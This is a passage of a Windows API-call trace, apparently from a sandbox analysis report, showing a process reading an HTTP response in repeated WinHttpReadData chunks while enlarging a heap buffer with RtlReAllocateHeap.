lpBuffer=0x7f2fd50*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.885] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f25d50, Size=0xf000) returned 0x7f25d50 [0108.885] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f32550, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f32550*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.887] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f25d50, Size=0x11800) returned 0x7f14530 [0108.887] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f23530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f23530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.888] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x14000) returned 0x7f14530 [0108.888] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f25d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f25d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.903] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x16800) returned 0x7f14530 [0108.903] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f28530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f28530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.904] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x19000) returned 0x7f14530 [0108.904] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f2ad30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f2ad30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.905] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x1b800) returned 0x7f14530 [0108.905] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f2d530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f2d530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.906] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x1e000) returned 0x7f14530 [0108.906] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f2fd30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f2fd30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.907] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x20800) returned 0x7f14530 [0108.907] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f32530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f32530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.908] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x23000) returned 0x7f34d40 [0108.909] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f55540, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f55540*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.980] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f34d40, Size=0x25800) returned 0x7f57d50 [0108.982] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f7ad50, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f7ad50*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.985] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f57d50, Size=0x28000) returned 0x7f14530 [0108.985] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f39d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f39d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.985] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x2a800) returned 0x7f14530 [0108.985] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f3c530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f3c530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.986] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x2d000) returned 0x7f14530 [0108.986] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f3ed30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f3ed30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.987] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x2f800) returned 0x7f14530 [0108.987] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f41530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f41530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.987] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x32000) returned 0x7f14530 [0108.987] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f43d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f43d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.988] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x34800) returned 0x7f14530 [0108.988] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f46530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f46530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.991] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x37000) returned 0x7f14530 [0108.991] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f48d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f48d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.992] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x39800) returned 0x7f14530 [0108.992] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f4b530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f4b530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.992] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x3c000) returned 0x7f14530 [0108.992] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f4dd30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f4dd30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.992] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x3e800) returned 0x7f14530 [0108.992] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f50530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f50530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.993] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x41000) returned 0x7f14530 [0108.993] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f52d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f52d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.993] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x43800) returned 0x7f14530 [0108.993] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f55530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f55530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.994] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x46000) returned 0x7f14530 [0108.994] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f57d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f57d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.994] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x48800) returned 0x7f14530 [0108.994] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f5a530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f5a530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.995] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x4b000) returned 0x7f14530 [0108.995] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f5cd30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f5cd30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.995] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x4d800) returned 0x7f14530 [0108.995] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f5f530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f5f530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.995] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x50000) returned 0x7f14530 [0108.995] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f61d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f61d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.996] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x52800) returned 0x7f14530 [0108.996] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f64530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f64530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.007] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x55000) returned 0x7f14530 [0109.007] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f66d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f66d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.008] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x57800) returned 0x7f14530 [0109.008] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f69530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f69530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.008] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x5a000) returned 0x7f14530 [0109.008] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f6bd30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f6bd30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.009] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x5c800) returned 0x7f14530 [0109.009] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f6e530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f6e530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.009] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x5f000) returned 0x7f14530 [0109.009] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f70d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f70d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.009] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x61800) returned 0x7f14530 [0109.009] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f73530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f73530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.010] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x64000) returned 0x7f14530 [0109.010] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f75d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f75d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.030] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x66800) returned 0x7f14530 [0109.030] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f78530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f78530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.031] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x69000) returned 0x7f14530 [0109.031] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f7ad30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f7ad30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.031] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x6b800) returned 0x8090080 [0109.075] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x80f9080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x80f9080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.076] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x6e000) returned 0x80fb890 [0109.080] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8167090, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8167090*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.080] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x80fb890, Size=0x70800) returned 0x8300080 [0109.117] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x836e080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x836e080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.118] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0x73000) returned 0x8090080 [0109.118] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8100880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8100880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.120] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x75800) returned 0x8090080 [0109.121] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8103080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8103080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.122] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x78000) returned 0x8090080 [0109.122] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8105880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8105880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.125] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x7a800) returned 0x8090080 [0109.125] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8108080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8108080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.129] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x7d000) returned 0x8090080 [0109.129] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x810a880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x810a880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.131] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x7f800) returned 0x8090080 [0109.131] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x810d080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x810d080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.135] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x82000) returned 0x8090080 [0109.135] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x810f880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x810f880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.143] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x84800) returned 0x8090080 [0109.143] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8112080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8112080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.145] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x87000) returned 0x8090080 [0109.146] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8114880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8114880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.147] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x89800) returned 0x8090080 [0109.148] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8117080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8117080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.148] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x8c000) returned 0x8090080 [0109.148] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8119880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8119880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.148] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x8e800) returned 0x8090080 [0109.148] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x811c080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x811c080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.149] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x91000) returned 0x8090080 [0109.149] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x811e880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x811e880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.149] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x93800) returned 0x8090080 [0109.149] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8121080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8121080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.150] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x96000) returned 0x8090080 [0109.150] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8123880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8123880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.150] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x98800) returned 0x8090080 [0109.150] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8126080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8126080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.151] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x9b000) returned 0x8090080 [0109.151] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8128880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8128880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.151] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0x9d800) returned 0x8090080 [0109.151] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x812b080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x812b080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.151] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xa0000) returned 0x8090080 [0109.151] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x812d880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x812d880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.152] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xa2800) returned 0x8090080 [0109.152] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8130080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8130080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.152] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xa5000) returned 0x8090080 [0109.152] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8132880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8132880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.153] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xa7800) returned 0x8090080 [0109.153] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8135080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8135080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.153] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xaa000) returned 0x8090080 [0109.153] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8137880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8137880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.154] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xac800) returned 0x8090080 [0109.154] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x813a080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x813a080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.154] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xaf000) returned 0x8090080 [0109.154] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x813c880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x813c880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.154] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xb1800) returned 0x8090080 [0109.155] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x813f080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x813f080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.155] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xb4000) returned 0x8090080 [0109.155] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8141880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8141880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.155] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xb6800) returned 0x8090080 [0109.155] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8144080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8144080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.156] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xb9000) returned 0x8090080 [0109.156] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8146880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8146880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.156] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xbb800) returned 0x8090080 [0109.156] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8149080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8149080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.157] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xbe000) returned 0x8090080 [0109.157] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x814b880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x814b880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.157] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xc0800) returned 0x8090080 [0109.157] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x814e080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x814e080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.157] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xc3000) returned 0x8090080 [0109.157] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8150880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8150880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.158] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xc5800) returned 0x8090080 [0109.158] WinHttpReadData (in: 